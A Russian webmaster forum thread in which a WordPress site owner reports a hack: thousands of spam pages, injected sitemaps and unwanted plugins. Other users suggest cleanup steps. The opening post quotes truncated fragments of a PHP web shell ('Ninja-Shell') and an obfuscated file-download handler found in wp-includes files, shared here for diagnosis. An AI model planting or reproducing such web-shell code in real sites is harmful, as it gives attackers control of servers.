Форум Сайтостроение Безопасность

Ломанули сайт

123 4
Aurums
На сайте с 28.02.2020
Offline
68
Aurums
1069

+16000 страниц, которых нет в админки.  +Xml карт сайт множество. 

ai-bolit находит скрипт, удалил. Он опять находит, но скрипта уже там нет. 

Xml со скрина как-то подтянулись в Вебмастер. Может с плагина "Лента Yandex Turbo"

Второй день копаю.

Вчера у сайта белый экран был. Даже дебаг Wp ошибку не показывал. Бекап накатил, пока вроде признаков нет, но это только пока)))

wp-includes/assets/php-compat/admin.php

[x] …"];$GLOBALS["get"]=$funct["_GET"];$GLOBALS["server"]=$funct["_SERVER"];$GLOBALS["files"]=$funct["_FILES"];?><html><head> <title>{Ninja-Shell}</title><meta charset="UTF-8"><meta name="robots" content="NOINDEX,NOFOLLOW"><link rel="icon" href=


wp-includes/blocks/footnotes/about.php

T["g"])){$GNJ[38]($GNJ[9]);header("Content-Type: application/octet-stream");header("Content-Transfer-Encoding: Binary"); header("Content-Length: ".$GNJ[34](uhex($_GET["g"])));header("Content-disposition: attachment;filename=\"".uhex($_GET["


jpg 1.jpg
jpg xml.jpg
W1
На сайте с 22.01.2021
Offline
287
webinfo
#1
Aurums :
Второй день копаю.

Информация очень интересная. Копай дальше. В чём конкретный вопрос к форуму, кроме этой занимательной истории?

Мой форум - https://webinfo.guru –Там я всегда на связи
W1
На сайте с 22.01.2021
Offline
287
webinfo
#2
Aurums :
Бекап накатил, пока вроде признаков нет, но это только пока

Естественно. Жди повторного взлома. Только не спеши снова бэкап накатывать - может быть, ещё не всё испортил.

PA
На сайте с 15.02.2018
Offline
99
Pavel A
#3
Aurums :

Xml со скрина как-то подтянулись в Вебмастер

C robots.txt подтянулось походу.

Wordfence стоит?

Продаю ХОСТИНГ, VDS шикарные | Дедик, VDS, Бекап ( https://is.gd/vgd245 ) дешево | Мои VDS ( https://is.gd/vds100 ) быстрее твоих
Good-HOST support
На сайте с 07.06.2022
Offline
14
Good-HOST support
#4
Aurums :

+16000 страниц, которых нет в админки.  +Xml карт сайт множество. 

ai-bolit находит скрипт, удалил. Он опять находит, но скрипта уже там нет. 

Xml со скрина как-то подтянулись в Вебмастер. Может с плагина "Лента Yandex Turbo"

Второй день копаю.

Вчера у сайта белый экран был. Даже дебаг Wp ошибку не показывал. Бекап накатил, пока вроде признаков нет, но это только пока)))



а версии Wordpress, темы и плагинов стояли все новые? 



https://good-host.net/ - провайдер Windows/Linux VPS, хостинга в Германии, Финляндии и США. Работаем с 2007 года.
N5
На сайте с 14.12.2018
Offline
50
noob58
#5
Если это не брут, а скорее всего это не брут, то никакого смысла накатывать бэкап без закрытия дыры нет, его вновь сломают
Aurums
На сайте с 28.02.2020
Offline
68
Aurums
#6

Пошли плагины ставятся, которых не ставил 😀 +2500 страниц в Вебмастере. Ищем дырку.


B
На сайте с 22.03.2023
Offline
22
bestbestbest
#7

Вот поэтому я не люблю wp, ненадежный движок. Недавно решил дать шанс wp, установил, добавил статьи, плагины проверял новые для функциональности. Потом смотрю, а карт сайты сотни с десятки тысяч страниц на японском. Бэкап делал, но толку 0. Оказалось, что плагин какой-то сам установился левый вместе с нужным мне. Все плагины в поиске с админки устаавливал, думал там все проверено, ничего не скачивал с сайтов.

Полностью удалял сайт с сервера, заново устанавливал, но плагины добавил только самые важные. Сейчас все ок. Кстати в гугл searchconsole в настройках пользователя появился левый тип со статусом владельца, удалил его. Он подтвертил файлом и успел добавить много карт сайта и пару сотен проиндексировались.  Поищи может серч консоль тоже. Хорошо, что ссылки однотипные с одним названием вида /spam/fffdd.html, быстро удалил из поиска. Темы лучше брать проверенные и плагины тоже как можно меньше.

eTarget 2011:Панельная дискуссия «Стратегия eTarget 2011: Круглый стол Могут ли «плохие» входящие
AfterWar
На сайте с 28.01.2013
Online
169
AfterWar
#8
Aurums #:

Пошли плагины ставятся, которых не ставил 😀 +2500 страниц в Вебмастере. Ищем дырку.


Попробуй https://patchstack.com/ - на blackhatworld когда то посоветовали,  сказали хорошо уязвимости ищет, фришный тариф есть

⭐⭐⭐ЛУЧШАЯ АЛЬТЕРНАТИВА ADSENSE (ПЛАТЯТ, И ДЛЯ RU ДЛЯ БУРЖ) ( https://clck.ru/KgyqY )
B
На сайте с 22.03.2023
Offline
22
bestbestbest
#9
Вместо поисков уязвимости лучше скопируй все статьи в ворд. Удали полностью сайт с  сервера и установи заново, потом добавь скопированные статьи заново. Это займет максимум час. Лучше ,чем днями искать не пойми что. Только потом делать резервную копию и пробовать плагины добавлять.
Вирус Wordpress Копия сайта под другую Резкий всплеск прямых заходов.
M
На сайте с 17.06.2021
Offline
64
makepuff
#10
Aurums #:

Пошли плагины ставятся, которых не ставил 😀 +2500 страниц в Вебмастере. Ищем дырку.


пробовали такое? 
восстановить старый бэкап, где точно все ок... удалить все плаги, поменять пароль на базе и админке, на фтп / сфтп
это вроде базовые вещи, если плаг фтп доступ получил то любой откат не поможет, пока все пароли не обновишь

Bybit крипто биржа https://partner.bybit.com/b/58507 /// Зарубежные VPS с оплатой РФ картами https://aeza.net/?ref=416422 (+15% к пополнению)
eTarget 2011:Панельная дискуссия «Стратегия eTarget 2011: Круглый стол Могут ли «плохие» входящие
123 4

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий